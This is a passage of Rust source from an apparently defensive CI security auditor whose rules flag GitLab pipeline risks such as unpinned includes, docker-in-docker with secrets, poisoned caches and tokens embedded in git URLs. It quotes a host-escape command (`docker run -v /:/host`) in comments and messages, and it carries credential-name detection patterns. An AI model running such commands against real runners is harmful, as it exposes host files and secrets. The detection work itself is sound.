        [b'v', second, ..] => second.is_ascii_digit(),
        [first, ..] => first.is_ascii_digit() && ref_seg.contains('.'),
        [] => false,
    };

    if is_full_sha || looks_like_tag {
        None
    } else {
        Some(ref_seg.to_string())
    }
}
5089
5090/// Rule: `unpinned_include_remote_or_branch_ref` (High, Supply Chain).
5091///
5092/// Top-level GitLab `include:` of a `remote:` URL pinned to a branch, a
5093/// `project:` whose `ref:` is a mutable branch (main/master/develop/...), or
5094/// an include with no `ref:` at all (defaults to HEAD on the source repo).
5095///
5096/// Skips `local:` includes (same repo — same trust boundary), `template:`
5097/// includes (GitLab-maintained), and `component:` includes that have an `@`
5098/// version pin. Reads the structured `META_GITLAB_INCLUDES` blob the parser
5099/// stamps on the graph.
5100pub fn unpinned_include_remote_or_branch_ref(graph: &AuthorityGraph) -> Vec<Finding> {
5101    use taudit_parse_gitlab_include_view::IncludeView;
5102
5103    let blob = match graph.metadata.get(META_GITLAB_INCLUDES) {
5104        Some(s) => s,
5105        None => return Vec::new(),
5106    };
5107    let entries: Vec<IncludeView> = match serde_json::from_str(blob) {
5108        Ok(e) => e,
5109        Err(_) => return Vec::new(),
5110    };
5111
5112    let mut findings = Vec::new();
5113
5114    for entry in entries {
5115        let kind = entry.kind.as_str();
5116        let target = entry.target.as_str();
5117        let git_ref = entry.git_ref.as_str();
5118
5119        match kind {
5120            // local / template / component — skip (or handled separately for
5121            // unversioned components).
5122            "local" | "template" => continue,
5123            "component" => {
5124                if git_ref.is_empty() {
5125                    findings.push(Finding {
5126                        severity: Severity::High,
5127                        category: FindingCategory::UnpinnedIncludeRemoteOrBranchRef,
5128                        path: None,
5129                        nodes_involved: vec![],
5130                        message: format!(
5131                            "include: component '{target}' has no version pin (no '@<version>') — owner of the component repo can rewrite every consumer's pipeline silently"
5132                        ),
5133                        recommendation: Recommendation::PinAction {
5134                            current: target.to_string(),
5135                            pinned: format!("{target}@<sha-or-tag>"),
5136                        },
5137                        source: FindingSource::BuiltIn,
5138                        extras: FindingExtras::default(),
5139                    });
5140                }
5141            }
5142            "remote" => {
5143                if let Some(branch) = remote_url_uses_branch(target) {
5144                    findings.push(Finding {
5145                        severity: Severity::High,
5146                        category: FindingCategory::UnpinnedIncludeRemoteOrBranchRef,
5147                        path: None,
5148                        nodes_involved: vec![],
5149                        message: format!(
5150                            "include: remote URL pins branch '{branch}' ({target}) — included YAML executes with consumer's CI_JOB_TOKEN and secrets; whoever controls that branch can backdoor this pipeline"
5151                        ),
5152                        recommendation: Recommendation::PinAction {
5153                            current: target.to_string(),
5154                            pinned: target.replacen(
5155                                &format!("/-/raw/{branch}/"),
5156                                "/-/raw/<full-sha>/",
5157                                1,
5158                            ),
5159                        },
5160                        source: FindingSource::BuiltIn,
5161                        extras: FindingExtras::default(),
5162                    });
5163                }
5164            }
5165            "project" => {
5166                let lower = git_ref.to_ascii_lowercase();
5167                let is_branch = MUTABLE_BRANCH_REFS
5168                    .iter()
5169                    .any(|b| b.eq_ignore_ascii_case(&lower));
5170                let missing = git_ref.is_empty();
5171                let is_sha = git_ref.len() == 40 && git_ref.chars().all(|c| c.is_ascii_hexdigit());
5172                if (missing || is_branch) && !is_sha {
5173                    let why = if missing {
5174                        "no `ref:` (defaults to HEAD on source project)".to_string()
5175                    } else {
5176                        format!("`ref: {git_ref}` is a mutable branch")
5177                    };
5178                    findings.push(Finding {
5179                        severity: Severity::High,
5180                        category: FindingCategory::UnpinnedIncludeRemoteOrBranchRef,
5181                        path: None,
5182                        nodes_involved: vec![],
5183                        message: format!(
5184                            "include: project '{target}' — {why}; included YAML can redefine every job's `script:` and runs with consumer's secrets"
5185                        ),
5186                        recommendation: Recommendation::PinAction {
5187                            current: format!(
5188                                "project: {target}{}",
5189                                if missing {
5190                                    String::new()
5191                                } else {
5192                                    format!(", ref: {git_ref}")
5193                                }
5194                            ),
5195                            pinned: format!("project: {target}, ref: <full-commit-sha>"),
5196                        },
5197                        source: FindingSource::BuiltIn,
5198                        extras: FindingExtras::default(),
5199                    });
5200                }
5201            }
5202            _ => {}
5203        }
5204    }
5205
5206    findings
5207}
5208
5209/// Rule: `dind_service_grants_host_authority` (High, Privilege).
5210///
5211/// A GitLab job that declares a `services: [docker:*-dind]` sidecar AND
5212/// holds at least one secret (other than the implicit, structurally-present
5213/// CI_JOB_TOKEN). The dind sidecar exposes the full Docker socket inside
5214/// the job container, so a malicious build step can `docker run -v /:/host`
5215/// and read the runner host filesystem.
5216pub fn dind_service_grants_host_authority(graph: &AuthorityGraph) -> Vec<Finding> {
5217    let mut findings = Vec::new();
5218
5219    for step in graph.nodes_of_kind(NodeKind::Step) {
5220        let has_dind = step
5221            .metadata
5222            .get(META_GITLAB_DIND_SERVICE)
5223            .map(|v| v == "true")
5224            .unwrap_or(false);
5225        if !has_dind {
5226            continue;
5227        }
5228
5229        // Walk this step's HasAccessTo edges for secrets / non-implicit
5230        // identities. The implicit CI_JOB_TOKEN does not count — every job
5231        // has it by platform design, so flagging on it would emit noise on
5232        // every dind job.
5233        let mut sensitive: Vec<String> = Vec::new();
5234        for edge in graph.edges_from(step.id) {
5235            if edge.kind != EdgeKind::HasAccessTo {
5236                continue;
5237            }
5238            let target = match graph.node(edge.to) {
5239                Some(n) => n,
5240                None => continue,
5241            };
5242            let is_implicit = target
5243                .metadata
5244                .get(META_IMPLICIT)
5245                .map(|v| v == "true")
5246                .unwrap_or(false);
5247            if is_implicit {
5248                continue;
5249            }
5250            match target.kind {
5251                NodeKind::Secret => sensitive.push(target.name.clone()),
5252                NodeKind::Identity => sensitive.push(target.name.clone()),
5253                _ => {}
5254            }
5255        }
5256
5257        if sensitive.is_empty() {
5258            continue;
5259        }
5260
5261        sensitive.sort();
5262        sensitive.dedup();
5263        // Cap the message length — corpora include jobs with dozens of vars.
5264        let preview = if sensitive.len() > 4 {
5265            format!(
5266                "{} (and {} more)",
5267                sensitive[..4].join(", "),
5268                sensitive.len() - 4
5269            )
5270        } else {
5271            sensitive.join(", ")
5272        };
5273
5274        findings.push(Finding {
5275            severity: Severity::High,
5276            category: FindingCategory::DindServiceGrantsHostAuthority,
5277            path: None,
5278            nodes_involved: vec![step.id],
5279            message: format!(
5280                "Step '{}' uses a docker:dind service AND holds secrets [{}] — a malicious build step can `docker run -v /:/host` from inside dind and exfiltrate the runner's filesystem (other jobs' artifacts, cached creds)",
5281                step.name, preview
5282            ),
5283            recommendation: Recommendation::Manual {
5284                action: "Replace docker-in-docker with kaniko / buildah / img for image builds (no privileged sidecar required), OR isolate the dind job to a dedicated runner pool with no shared workspace and no other secrets in scope.".into(),
5285            },
5286            source: FindingSource::BuiltIn,
5287            extras: FindingExtras::default(),
5288        });
5289    }
5290
5291    findings
5292}
5293
/// Substrings (case-insensitive) that identify a GitLab security scanner job
/// either by job name or by an `extends:` template name.
///
/// `step_matches_scanner` lower-cases the candidate and tests it with
/// `contains`, so entries must be lowercase and match anywhere in the name.
/// Because matching is by substring, the `*_fuzzing` / `*-fuzzing` entries
/// are already covered by `"fuzz"`; they are listed for readability.
const SCANNER_PATTERNS: &[&str] = &[
    "sast",
    "dast",
    "secret_detection",
    "secret-detection",
    "dependency_scanning",
    "dependency-scanning",
    "container_scanning",
    "container-scanning",
    "gitleaks",
    "trivy",
    "grype",
    "semgrep",
    "bandit",
    "snyk",
    "license_scanning",
    "license-scanning",
    "iac_scan",
    "iac-scan",
    "fuzz",
    "api_fuzzing",
    "api-fuzzing",
    "coverage_fuzzing",
    "coverage-fuzzing",
];
5321
5322fn step_matches_scanner(step_name: &str, extends: Option<&String>) -> bool {
5323    let lower = step_name.to_ascii_lowercase();
5324    if SCANNER_PATTERNS.iter().any(|p| lower.contains(p)) {
5325        return true;
5326    }
5327    if let Some(ext) = extends {
5328        let elower = ext.to_ascii_lowercase();
5329        if SCANNER_PATTERNS.iter().any(|p| elower.contains(p)) {
5330            return true;
5331        }
5332    }
5333    false
5334}
5335
5336/// Rule: `security_job_silently_skipped` (Medium, Configuration).
5337///
5338/// A security-scanner job (matched by name or `extends:` template) runs with
5339/// `allow_failure: true` and no `rules:` clause that surfaces the failure.
5340/// The pipeline goes green even when the scan errors out — silent-pass is
5341/// worse than no scan because reviewers trust the badge.
5342///
5343/// We can't statically prove the absence of a "surface failures" rule from
5344/// YAML alone, so we fire whenever `allow_failure: true` is set on a scanner
5345/// job and let the operator confirm. The recommendation guides them to the
5346/// fix.
5347pub fn security_job_silently_skipped(graph: &AuthorityGraph) -> Vec<Finding> {
5348    let mut findings = Vec::new();
5349
5350    for step in graph.nodes_of_kind(NodeKind::Step) {
5351        let allow_failure = step
5352            .metadata
5353            .get(META_GITLAB_ALLOW_FAILURE)
5354            .map(|v| v == "true")
5355            .unwrap_or(false);
5356        if !allow_failure {
5357            continue;
5358        }
5359
5360        let extends = step.metadata.get(META_GITLAB_EXTENDS);
5361        if !step_matches_scanner(&step.name, extends) {
5362            continue;
5363        }
5364
5365        let how = match extends {
5366            Some(e) => format!("matched by extends: {e}"),
5367            None => "matched by job name".to_string(),
5368        };
5369
5370        findings.push(Finding {
5371            severity: Severity::Medium,
5372            category: FindingCategory::SecurityJobSilentlySkipped,
5373            path: None,
5374            nodes_involved: vec![step.id],
5375            message: format!(
5376                "Security-scanner job '{}' ({how}) runs with allow_failure: true — when the scan errors out the pipeline still goes green; reviewers trust a badge that is no longer evidence",
5377                step.name
5378            ),
5379            recommendation: Recommendation::Manual {
5380                action: "Either drop `allow_failure: true` and let the scanner gate the pipeline, OR add a follow-up `rules:` clause that surfaces the failure (e.g. a stage that asserts the scan report exists and is non-empty). A scanner that fails closed is worth more than a scanner that fails silently.".into(),
5381            },
5382            source: FindingSource::BuiltIn,
5383            extras: FindingExtras::default(),
5384        });
5385    }
5386
5387    findings
5388}
5389
5390/// Rule: `child_pipeline_trigger_inherits_authority` (Medium, Propagation).
5391///
5392/// A GitLab `trigger:` job (downstream / child pipeline) either runs in
5393/// `merge_request_event` context OR is a *dynamic* child pipeline whose
5394/// included YAML comes from a previous job's `artifact:`. Both shapes mean
5395/// untrusted input shapes the pipeline that runs with the parent project's
5396/// CI_JOB_TOKEN and secrets.
5397pub fn child_pipeline_trigger_inherits_authority(graph: &AuthorityGraph) -> Vec<Finding> {
5398    let graph_is_mr = graph
5399        .metadata
5400        .get(META_TRIGGER)
5401        .map(|v| v == "merge_request")
5402        .unwrap_or(false);
5403
5404    let mut findings = Vec::new();
5405
5406    for step in graph.nodes_of_kind(NodeKind::Step) {
5407        let kind = match step.metadata.get(META_GITLAB_TRIGGER_KIND) {
5408            Some(k) => k.as_str(),
5409            None => continue,
5410        };
5411
5412        let is_dynamic = kind == "dynamic";
5413        let is_mr = graph_is_mr;
5414
5415        if !is_dynamic && !is_mr {
5416            continue;
5417        }
5418
5419        let mut reasons: Vec<&str> = Vec::new();
5420        if is_dynamic {
5421            reasons.push("includes child YAML from a previous job's artifact (dynamic child pipeline — code-injection sink)");
5422        }
5423        if is_mr {
5424            reasons.push(
5425                "runs in merge_request_event context — fork code shapes the downstream pipeline",
5426            );
5427        }
5428        let why = reasons.join(" AND ");
5429
5430        findings.push(Finding {
5431            severity: Severity::Medium,
5432            category: FindingCategory::ChildPipelineTriggerInheritsAuthority,
5433            path: None,
5434            nodes_involved: vec![step.id],
5435            message: format!(
5436                "Trigger job '{}' {why}; the downstream pipeline inherits the parent project's CI_JOB_TOKEN and any reachable secrets",
5437                step.name
5438            ),
5439            recommendation: Recommendation::Manual {
5440                action: "For dynamic child pipelines: validate the generated YAML against a schema before triggering, or pre-stage all child pipeline files in-tree and use `include:` (static) instead of `include: artifact:`. For MR-triggered triggers: gate the downstream with `rules: if: $CI_PIPELINE_SOURCE != 'merge_request_event'` so fork PRs cannot reach it.".into(),
5441            },
5442            source: FindingSource::BuiltIn,
5443            extras: FindingExtras::default(),
5444        });
5445    }
5446
5447    findings
5448}
5449
/// Heuristic for cache keys that are shared across trust boundaries.
///
/// After trimming surrounding whitespace, returns `Some(reason)` when the key
/// is empty, is exactly the job-name variable (`$CI_JOB_NAME` in any ASCII
/// case, or `${CI_JOB_NAME}`), or contains no `$` at all (hardcoded).
/// Returns `None` for every other key. A key of `$CI_COMMIT_REF_SLUG` alone
/// is not judged here — the caller handles it because the verdict depends on
/// the cache policy.
fn unsafe_cache_key(key: &str) -> Option<&'static str> {
    let key = key.trim();
    // The case-insensitive comparison also covers the exact `$CI_JOB_NAME` spelling.
    let job_name_only = key == "${CI_JOB_NAME}" || key.eq_ignore_ascii_case("$ci_job_name");

    let reason = if key.is_empty() {
        // GitLab falls back to the key `default` when none is set, which has
        // the same blast radius as a hardcoded key.
        "absent (defaults to a single shared 'default' key per runner)"
    } else if job_name_only {
        "`$CI_JOB_NAME` only — same name on MR and default-branch jobs share the cache"
    } else if !key.contains('$') {
        "hardcoded — every job and every branch share the same cache"
    } else {
        return None;
    };
    Some(reason)
}
5475
5476/// Rule: `cache_key_crosses_trust_boundary` (Medium, Supply Chain).
5477///
5478/// A GitLab `cache:` declaration whose `key:` is hardcoded, `$CI_JOB_NAME`
5479/// only, or `$CI_COMMIT_REF_SLUG` *without* a `policy: pull` restriction.
5480/// Caches are stored per-runner keyed by `key:` — a poisoned MR can push a
5481/// malicious `node_modules/` cache that the next default-branch job
5482/// downloads and executes.
5483pub fn cache_key_crosses_trust_boundary(graph: &AuthorityGraph) -> Vec<Finding> {
5484    let mut findings = Vec::new();
5485
5486    for step in graph.nodes_of_kind(NodeKind::Step) {
5487        let key = match step.metadata.get(META_GITLAB_CACHE_KEY) {
5488            Some(k) => k,
5489            None => continue,
5490        };
5491        let policy = step
5492            .metadata
5493            .get(META_GITLAB_CACHE_POLICY)
5494            .map(|s| s.as_str())
5495            .unwrap_or("pull-push"); // GitLab's runtime default
5496
5497        // pull-only consumers cannot poison the cache — skip those
5498        let is_pull_only = matches!(policy, "pull");
5499
5500        let trimmed = key.trim();
5501
5502        // Per-ref key: $CI_COMMIT_REF_SLUG. Safe ONLY when the consuming jobs
5503        // restrict themselves to `policy: pull`. Without that restriction, an
5504        // MR job pushes a cache the next protected-branch job downloads
5505        // (refs are *namespaced* but not *isolated* — the same key on `main`
5506        // shadows over time and the runner's per-key store is shared).
5507        let is_ref_slug = trimmed == "$CI_COMMIT_REF_SLUG"
5508            || trimmed == "${CI_COMMIT_REF_SLUG}"
5509            || trimmed.eq_ignore_ascii_case("$ci_commit_ref_slug");
5510        if is_ref_slug {
5511            if !is_pull_only {
5512                findings.push(Finding {
5513                    severity: Severity::Medium,
5514                    category: FindingCategory::CacheKeyCrossesTrustBoundary,
5515                    path: None,
5516                    nodes_involved: vec![step.id],
5517                    message: format!(
5518                        "Step '{}' uses cache key `$CI_COMMIT_REF_SLUG` with policy `{policy}` — MR jobs can push poisoned caches that subsequent default-branch jobs restore (npm install / Maven plugin resolution executes cached artifacts)",
5519                        step.name
5520                    ),
5521                    recommendation: Recommendation::Manual {
5522                        action: "Set `policy: pull` on jobs that consume the cache from a different trust context (default-branch, protected refs), and restrict `policy: push` to a dedicated job that runs only on protected branches. Combine with `key: { files: [package-lock.json] }` so cache reuse requires identical input hashes.".into(),
5523                    },
5524                    source: FindingSource::BuiltIn,
5525                    extras: FindingExtras::default(),
5526                });
5527            }
5528            continue;
5529        }
5530
5531        if let Some(reason) = unsafe_cache_key(key) {
5532            findings.push(Finding {
5533                severity: Severity::Medium,
5534                category: FindingCategory::CacheKeyCrossesTrustBoundary,
5535                path: None,
5536                nodes_involved: vec![step.id],
5537                message: format!(
5538                    "Step '{}' has cache key `{key}` ({reason}) with policy `{policy}` — caches cross trust boundaries; an MR or fork can stage a poisoned cache that the next protected-branch job restores and executes",
5539                    step.name
5540                ),
5541                recommendation: Recommendation::Manual {
5542                    action: "Scope the cache key to inputs only an authorized run can produce, e.g. `key: { files: [package-lock.json] }` so the key changes when dependencies change, and combine with `policy: pull` on consumers in higher trust contexts.".into(),
5543                },
5544                source: FindingSource::BuiltIn,
5545                extras: FindingExtras::default(),
5546            });
5547        }
5548    }
5549
5550    findings
5551}
5552
/// Local view-struct mirroring `taudit_parse_gitlab::IncludeEntry` — kept here
/// so taudit-core does not depend on taudit-parse-gitlab. The two crates pass
/// data only through the JSON blob in `META_GITLAB_INCLUDES`.
///
/// NOTE(review): no field carries a serde default, so presumably all three
/// keys must be present in every JSON entry; `unpinned_include_remote_or_branch_ref`
/// returns no findings when the blob fails to deserialize — confirm the
/// parser always emits all three.
mod taudit_parse_gitlab_include_view {
    use serde::Deserialize;
    /// One `include:` entry as read by `unpinned_include_remote_or_branch_ref`.
    #[derive(Debug, Clone, Deserialize)]
    pub struct IncludeView {
        /// Include flavour; the rule distinguishes `"local"`, `"template"`,
        /// `"component"`, `"remote"` and `"project"` and ignores anything else.
        pub kind: String,
        /// What is being included: the URL for `remote` entries, otherwise the
        /// component / project identifier echoed in the finding message.
        pub target: String,
        /// Ref / version pin of the include; the rule treats an empty string
        /// as "no pin given".
        pub git_ref: String,
    }
}
5565
5566/// Rule: a CI script body constructs an HTTPS git URL with credentials
5567/// embedded directly in the URL (`https://user:$TOKEN@host/...`) and
5568/// invokes git against it (`git clone`, `git push`, `git remote set-url`,
5569/// `git fetch`, `git ls-remote`).
5570///
5571/// Detection: scan `META_SCRIPT_BODY` for the regex equivalent
5572/// `https://[^/\s'"]*:\$\{?[A-Z0-9_]*(TOKEN|PAT|PASSWORD|PASSWD|KEY|SECRET)[A-Z0-9_]*\}?@`
5573/// implemented byte-by-byte to keep the dependency surface minimal.
5574///
5575/// Severity: **High**. Embedded credentials persist in `.git/config`,
5576/// are visible to every subsequent process via `ps`/`/proc/*/cmdline`,
5577/// land in `GIT_TRACE` output when set, and may be uploaded as part of
5578/// any artifact that bundles the workspace.
5579pub fn pat_embedded_in_git_remote_url(graph: &AuthorityGraph) -> Vec<Finding> {
5580    let mut findings = Vec::new();
5581
5582    for step in graph.nodes_of_kind(NodeKind::Step) {
5583        let body = match step.metadata.get(META_SCRIPT_BODY) {
5584            Some(b) if !b.trim().is_empty() => b,
5585            _ => continue,
5586        };
5587
5588        let hits = find_credential_embedded_git_urls(body);
5589        if hits.is_empty() {
5590            continue;
5591        }
5592
5593        // Cap message previews so we don't spam logs with huge URLs.
5594        let preview: String = hits
5595            .iter()
5596            .take(2)
5597            .map(|s| s.as_str())
5598            .collect::<Vec<_>>()
5599            .join(", ");
5600        let suffix = if hits.len() > 2 {
5601            format!(", and {} more", hits.len() - 2)
5602        } else {
5603            String::new()
5604        };
5605
5606        findings.push(Finding {
5607            severity: Severity::High,
5608            category: FindingCategory::PatEmbeddedInGitRemoteUrl,
5609            path: None,
5610            nodes_involved: vec![step.id],
5611            message: format!(
5612                "Step '{}' embeds a credential variable directly in a git remote URL ({}{}). The token value is exposed in process argv (visible to `ps`), persists in .git/config for the rest of the job, and is captured by GIT_TRACE if enabled.",
5613                step.name, preview, suffix
5614            ),
5615            recommendation: Recommendation::Manual {
5616                action: "Use a credential helper or env-var-based authentication instead of inlining the token in the URL. For GitLab CI, prefer `git -c http.extraHeader=\"PRIVATE-TOKEN: $PAT_TOKEN\" push <url>`, or set `CI_JOB_TOKEN` as the credential helper. Never construct `https://user:$TOKEN@host/...` URLs.".into(),
5617            },
5618            source: FindingSource::BuiltIn,
5619            extras: FindingExtras::default(),
5620        });
5621    }
5622
5623    findings
5624}
5625
5626/// Find substrings in `body` that look like
5627/// `https://<userpart>:<token-var-ref>@host`. Returns up to 8 unique hits
5628/// (stable order). The token variable is required to look like a credential
5629/// name (TOKEN/PAT/PASSWORD/PASSWD/KEY/SECRET) — bare `$VAR` references
5630/// without a credential-shaped name don't fire to keep the false-positive
5631/// rate down.
5632fn find_credential_embedded_git_urls(body: &str) -> Vec<String> {
5633    let mut hits: Vec<String> = Vec::new();
5634    let bytes = body.as_bytes();
5635    let mut i = 0usize;
5636    let needle = b"https://";
5637
5638    while i + needle.len() <= bytes.len() {
5639        if &bytes[i..i + needle.len()] != needle {
5640            i += 1;
5641            continue;
5642        }
5643        // Find the end of the URL "authority" component — terminator is the
5644        // next `/`, whitespace, quote, or end-of-string.
5645        let mut end = i + needle.len();
5646        while end < bytes.len() {
5647            let c = bytes[end];
5648            if c == b'/'
5649                || c == b' '
5650                || c == b'\t'
5651                || c == b'\n'
5652                || c == b'\r'
5653                || c == b'"'
5654                || c == b'\''
5655                || c == b'`'
5656            {
5657                break;
5658            }
5659            end += 1;
5660        }
5661        let authority = &body[i + needle.len()..end];
5662
5663        if url_authority_has_embedded_credential_var(authority) {
5664            // Capture the full URL up to the path delimiter for the message.
5665            let urlend = end;
5666            let url = &body[i..urlend];
5667            let url_short = if url.len() > 120 {
5668                format!("{}…", &url[..120])
5669            } else {
5670                url.to_string()
5671            };
5672            if !hits.contains(&url_short) {
5673                hits.push(url_short);
5674                if hits.len() == 8 {
5675                    break;
5676                }
5677            }
5678        }
5679
5680        i = end.max(i + 1);
5681    }
5682
5683    hits
5684}
5685
/// Decide whether a URL's authority component (everything after `https://`
/// and before the path) contains a credential-shaped variable reference of
/// the form `user:$TOKEN_NAME@host` or `user:${TOKEN_NAME}@host`.
///
/// Requirements, all of which must hold:
/// * the authority has an `@`, and the userinfo before the first `@` has a
///   `:`; the password part is what follows the first `:`;
/// * the password part starts with at least one `$` — a literal password
///   without the sigil is not a variable reference and is not reported here;
/// * after the sigil comes either a bare name or a name wrapped in a matching
///   `{`…`}` pair;
/// * the name is non-empty, consists only of ASCII uppercase letters, digits
///   and `_`, and contains one of `TOKEN`, `PAT`, `PASSWORD`, `PASSWD`,
///   `KEY`, `SECRET`, `CRED`.
fn url_authority_has_embedded_credential_var(authority: &str) -> bool {
    const CRED_FRAGMENTS: &[&str] = &[
        "TOKEN", "PAT", "PASSWORD", "PASSWD", "KEY", "SECRET", "CRED",
    ];

    // `user:password@host` — split on the first '@', then the first ':'.
    let password = match authority
        .split_once('@')
        .and_then(|(userinfo, _host)| userinfo.split_once(':'))
    {
        Some((_user, password)) => password,
        None => return false,
    };

    // A variable reference needs its `$` sigil. Repeated sigils (`$$NAME`)
    // are tolerated, as before.
    let after_sigil = password.trim_start_matches('$');
    if after_sigil.len() == password.len() {
        return false;
    }

    // Accept `NAME` or `{NAME}`; an opening brace without its closing
    // partner is not a well-formed reference.
    let name = match after_sigil.strip_prefix('{') {
        Some(braced) => match braced.strip_suffix('}') {
            Some(inner) => inner,
            None => return false,
        },
        None => after_sigil,
    };

    let looks_like_var = !name.is_empty()
        && name
            .chars()
            .all(|c| c.is_ascii_uppercase() || c.is_ascii_digit() || c == '_');

    looks_like_var && CRED_FRAGMENTS.iter().any(|frag| name.contains(frag))
}
5723
5724/// Rule: a CI script triggers a different project's pipeline via the GitLab
5725/// REST API using `CI_JOB_TOKEN` and forwards variables via the
5726/// `variables[KEY]=value` query/form parameter. Cross-project authority
5727/// bridge — the downstream project's security depends on the trust contract
5728/// between the two projects, and variable values flowing across that
5729/// boundary may originate from MR/fork context the attacker controls.
5730///
5731/// Severity: **Medium**. Higher-risk when the triggering job runs on MR
5732/// pipelines (`META_TRIGGER == "merge_request"`) — the message annotates
5733/// that case explicitly so operators see the elevated risk.
5734pub fn ci_token_triggers_downstream_with_variable_passthrough(
5735    graph: &AuthorityGraph,
5736) -> Vec<Finding> {
5737    let mut findings = Vec::new();
5738    let pipeline_is_mr_triggered = graph
5739        .metadata
5740        .get(META_TRIGGER)
5741        .map(|t| t == "merge_request")
5742        .unwrap_or(false);
5743
5744    for step in graph.nodes_of_kind(NodeKind::Step) {
5745        let body = match step.metadata.get(META_SCRIPT_BODY) {
5746            Some(b) if !b.trim().is_empty() => b,
5747            _ => continue,
5748        };
5749
5750        if !script_triggers_downstream_with_passthrough(body) {
5751            continue;
5752        }
5753
5754        let suffix = if pipeline_is_mr_triggered {
5755            " (pipeline triggered on merge_request — variable values may originate from attacker-controlled MR context)"
5756        } else {
5757            ""
5758        };
5759
5760        findings.push(Finding {
5761            severity: Severity::Medium,
5762            category: FindingCategory::CiTokenTriggersDownstreamWithVariablePassthrough,
5763            path: None,
5764            nodes_involved: vec![step.id],
5765            message: format!(
5766                "Step '{}' triggers a downstream pipeline via the GitLab REST API using CI_JOB_TOKEN and forwards variables[…] in the request — this is a cross-project authority channel that bypasses the parent-child trust model{}",
5767                step.name, suffix
5768            ),
5769            recommendation: Recommendation::Manual {
5770                action: "Constrain which variables the downstream pipeline accepts (use `variables.X.expand: false` and explicit allowlists), prefer pipeline triggers via `trigger:` keyword with `strategy: depend` over `curl … CI_JOB_TOKEN …`, and audit the receiving project's CI/CD settings to ensure it does not honour caller-supplied variables on protected refs.".into(),
5771            },
5772            source: FindingSource::BuiltIn,
5773                extras: FindingExtras::default(),
5774});
5775    }
5776
5777    findings
5778}
5779
/// Returns true if `body` looks like a call to a GitLab pipeline-trigger
/// endpoint that authenticates with `CI_JOB_TOKEN` and forwards at least one
/// `variables[…]` field.
///
/// All three signals must be present somewhere in the script text:
///
/// 1. A trigger endpoint: `trigger/pipeline`, or `/api/v4/projects/` together
///    with `/trigger` (matched case-insensitively).
/// 2. A reference to `CI_JOB_TOKEN` (matched case-insensitively).
/// 3. A forwarded variable, in either form-data / literal form
///    (`variables[X]=...`, `-F "variables[X]=..."`) or percent-encoded
///    query-string form (`variables%5BX%5D=...`). The encoded form matters
///    because curl treats `[`/`]` in URLs as glob ranges, so query-string
///    callers routinely encode the brackets. The parameter name itself is
///    matched case-sensitively.
///
/// The HTTP client (curl, wget, …) is deliberately not inspected — any script
/// text carrying the three signals matches.
fn script_triggers_downstream_with_passthrough(body: &str) -> bool {
    let lower = body.to_lowercase();

    let hits_trigger_endpoint = lower.contains("trigger/pipeline")
        || (lower.contains("/api/v4/projects/") && lower.contains("/trigger"));
    if !hits_trigger_endpoint {
        return false;
    }
    if !lower.contains("ci_job_token") {
        return false;
    }

    // Literal brackets, or the percent-encoded opening bracket with either
    // hex-digit casing.
    body.contains("variables[")
        || body.contains("variables%5B")
        || body.contains("variables%5b")
}
5799
5800/// Rule: a job emits an `artifacts.reports.dotenv: <file>` artifact whose
5801/// contents become pipeline variables for any consumer linked via `needs:`
5802/// or `dependencies:`. A consumer in a later stage that targets a
5803/// production-named environment inherits those variables transparently.
5804/// Producer-side risk amplifies when the script reads attacker-influenced
5805/// inputs (`CI_COMMIT_REF_NAME`, `CI_MERGE_REQUEST_SOURCE_BRANCH_NAME`,
5806/// `CI_COMMIT_TAG`, branch/commit derived strings).
5807///
5808/// Severity: **High** when a producer→consumer chain exists with a
5809/// production-like environment on the consumer; **Medium** when the chain
5810/// exists but no production environment is detected (still a covert
5811/// variable-promotion channel).
5812pub fn dotenv_artifact_flows_to_privileged_deployment(graph: &AuthorityGraph) -> Vec<Finding> {
5813    let mut findings = Vec::new();
5814
5815    // Build (producer name -> producer step id, dotenv file) index.
5816    let mut producers: std::collections::HashMap<String, (NodeId, String)> =
5817        std::collections::HashMap::new();
5818    for step in graph.nodes_of_kind(NodeKind::Step) {
5819        if let Some(file) = step.metadata.get(META_DOTENV_FILE) {
5820            if let Some(job) = step.metadata.get(META_JOB_NAME) {
5821                producers.insert(job.clone(), (step.id, file.clone()));
5822            }
5823        }
5824    }
5825    if producers.is_empty() {
5826        return findings;
5827    }
5828
5829    for consumer in graph.nodes_of_kind(NodeKind::Step) {
5830        let needs_csv = match consumer.metadata.get(META_NEEDS) {
5831            Some(s) if !s.is_empty() => s,
5832            _ => continue,
5833        };
5834        let upstream_jobs: Vec<&str> = needs_csv.split(',').filter(|s| !s.is_empty()).collect();
5835        let matched: Vec<&(NodeId, String)> = upstream_jobs
5836            .iter()
5837            .filter_map(|j| producers.get(*j))
5838            .collect();
5839        if matched.is_empty() {
5840            continue;
5841        }
5842
5843        let env_name = consumer
5844            .metadata
5845            .get(META_ENVIRONMENT_NAME)
5846            .map(String::as_str)
5847            .unwrap_or("");
5848        // Production-like signal: explicit `environment.name:` value, OR
5849        // (fallback) the job name itself encodes a production marker.
5850        // GitLab pipelines often skip the explicit `environment:` block
5851        // and rely on stage/job naming conventions like `deploy-prod`.
5852        let consumer_job = consumer
5853            .metadata
5854            .get(META_JOB_NAME)
5855            .map(String::as_str)
5856            .unwrap_or(consumer.name.as_str());
5857        let production_like =
5858            is_production_environment(env_name) || is_production_environment(consumer_job);
5859
5860        // Decide elevation: production-like consumer environment OR
5861        // producer script ingests attacker-influenced CI variables.
5862        let producer_uses_untrusted_input = matched.iter().any(|(pid, _)| {
5863            graph
5864                .node(*pid)
5865                .and_then(|n| n.metadata.get(META_SCRIPT_BODY))
5866                .map(|b| script_uses_attacker_influenced_ci_var(b))
5867                .unwrap_or(false)
5868        });
5869
5870        if !production_like && !producer_uses_untrusted_input {
5871            continue; // benign dotenv flow — skip
5872        }
5873
5874        let severity = if production_like {
5875            Severity::High
5876        } else {
5877            Severity::Medium
5878        };
5879
5880        let producer_names: Vec<String> = upstream_jobs
5881            .iter()
5882            .filter(|j| producers.contains_key(**j))
5883            .map(|s| (*s).to_string())
5884            .collect();
5885
5886        let env_suffix = if production_like {
5887            if env_name.is_empty() {
5888                format!(" targeting production-like job name '{consumer_job}'")
5889            } else {
5890                format!(" targeting production-like environment '{env_name}'")
5891            }
5892        } else {
5893            String::new()
5894        };
5895        let trust_suffix = if producer_uses_untrusted_input {
5896            " (producer script reads attacker-influenced CI variables — branch/MR-source names propagate into the dotenv values)"
5897        } else {
5898            ""
5899        };
5900
5901        let mut nodes_involved = vec![consumer.id];
5902        nodes_involved.extend(matched.iter().map(|(id, _)| *id));
5903
5904        findings.push(Finding {
5905            severity,
5906            category: FindingCategory::DotenvArtifactFlowsToPrivilegedDeployment,
5907            path: None,
5908            nodes_involved,
5909            message: format!(
